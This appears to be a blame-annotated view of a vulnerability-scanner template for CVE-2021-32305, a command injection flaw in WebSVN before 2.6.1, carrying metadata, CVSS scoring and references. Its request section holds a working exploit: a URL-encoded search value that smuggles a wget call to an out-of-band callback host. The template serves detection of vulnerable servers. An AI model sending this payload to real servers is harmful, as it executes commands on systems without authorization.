2021-07-27 00:24:35 +00:00
|
|
|
id: CVE-2021-32305
|
|
|
|
|
|
|
|
info:
|
2022-05-18 20:58:07 +00:00
|
|
|
name: Websvn <2.6.1 - Remote Code Execution
|
2021-07-27 00:24:35 +00:00
|
|
|
author: gy741
|
|
|
|
severity: critical
|
2022-04-22 10:38:41 +00:00
|
|
|
description: WebSVN before 2.6.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the search parameter.
|
2021-08-19 13:59:12 +00:00
|
|
|
reference:
|
2021-07-27 00:24:35 +00:00
|
|
|
- https://packetstormsecurity.com/files/163225/Websvn-2.6.0-Remote-Code-Execution.html
|
2022-05-17 09:18:12 +00:00
|
|
|
- https://github.com/websvnphp/websvn/pull/142
|
|
|
|
- http://packetstormsecurity.com/files/163225/Websvn-2.6.0-Remote-Code-Execution.html
|
2022-05-18 20:58:07 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-32305
|
2021-09-10 11:26:40 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
2022-04-22 10:38:41 +00:00
|
|
|
cvss-score: 9.8
|
2021-09-10 11:26:40 +00:00
|
|
|
cve-id: CVE-2021-32305
|
|
|
|
cwe-id: CWE-78
|
2022-08-27 04:41:18 +00:00
|
|
|
tags: cve,cve2021,websvn,rce,oast,packetstorm
|
2021-07-27 00:24:35 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
GET /search.php?search=%22;wget+http%3A%2F%2F{{interactsh-url}}%27;%22 HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Accept-Encoding: gzip, deflate
|
|
|
|
Accept: */*
|
|
|
|
|
|
|
|
matchers:
|
|
|
|
- type: word
|
2022-02-21 18:33:16 +00:00
|
|
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
2021-07-27 00:24:35 +00:00
|
|
|
words:
|
|
|
|
- "http"
|
2022-05-18 20:58:07 +00:00
|
|
|
|
|
|
|
# Enhanced by mp on 2022/05/18
|